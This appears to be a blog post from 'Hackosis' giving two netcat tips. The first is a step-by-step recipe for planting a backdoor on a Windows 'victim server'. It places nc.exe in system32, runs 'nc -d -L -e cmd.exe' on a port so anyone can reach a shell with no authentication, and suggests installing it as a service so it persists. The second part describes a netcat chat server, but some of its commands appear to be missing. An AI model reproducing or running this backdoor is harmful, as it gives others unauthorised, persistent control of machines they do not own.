Hackosis

image by destinelee

Netcat is referred to as the TCP/IP swiss army knife. Netcat can be used for good things, as well as bad. By using Netcat we can create a back door to any Windows machine with ease.

1. Download the Windows version of Netcat.
2. Unzip nc.exe to the %SYSTEMROOT%\system32 directory.
3. Execute nc -d -L -e cmd.exe -p 10001. Change 10001 to which ever port you wish.
4. From any remote machine accessible to the victim server — you can now telnet to the server on port 10001 — telnet X.X.X.X 10001 — without any authentication.

NOTE: As soon as you disconnect netcat will stop running. You might look into running it as a service.

Have any more Netcat tips? Please share in the comments.

Ever use MSN instant messenger or Google Talk and feel like you are being watched? Well I have a little secret for you; you are being watched. Not that there is anything to hide, but privacy is always a good thing.

By using netcat we can setup a simple chat server, and it only takes about 5 minutes.

First, you need to make sure that you have netcat installed. Netcat is most likely included in your repositories if you are running Linux. Windows users can get the netcat Windows binary.

Ubuntu or Debian based sytems:

Make sure you open the port on your local firewall if need be and the rest is very simple. Lets assume that the server’s IP address is 192.168.10.1.

Run the netcat chat server on localhost (127.0.0.1) port 10001:

-n tells netcat not to do DNS lookup. Use this if you are using IPs only. It takes a long time for the DNS to timeout. If you are using hostnames, leave this switch off.
-v tells netcat to be verbose. This will allow you to see the chat messages in the terminal on the server.
-l tells netcat to listen for connections on the localhost. This will allow other nodes to connect to your chat server.
-p 10001 tells netcat what port to listen on. Again, make sure that you open the port on your firewall. This can be anything, but make it obscure and not a standard port.

Now lets say Bob wants to chat with you on your new netcat chat server. It is very easy for him to connect and talk with you.

Keep in mind that this is not secure. Anyone sniffing packets can intercept your messages. I am also unaware of any other security holes this might bring. If there is considerate knowledge of the network, I would assume it would be safe.

There are many ways we could add to this. We could use OpenSSL and have a secure chat. Also, we could log all chat messages to a file by redirecting the output of the netcat chat server ( >> chatlog.txt). There are many other possibilities including setting this up as a daemon with an init.d script. possibilities. If you have any netcat tips or ways to implement this with OpenSSL, I would love to hear it in the comments. dontripmyrsshackosis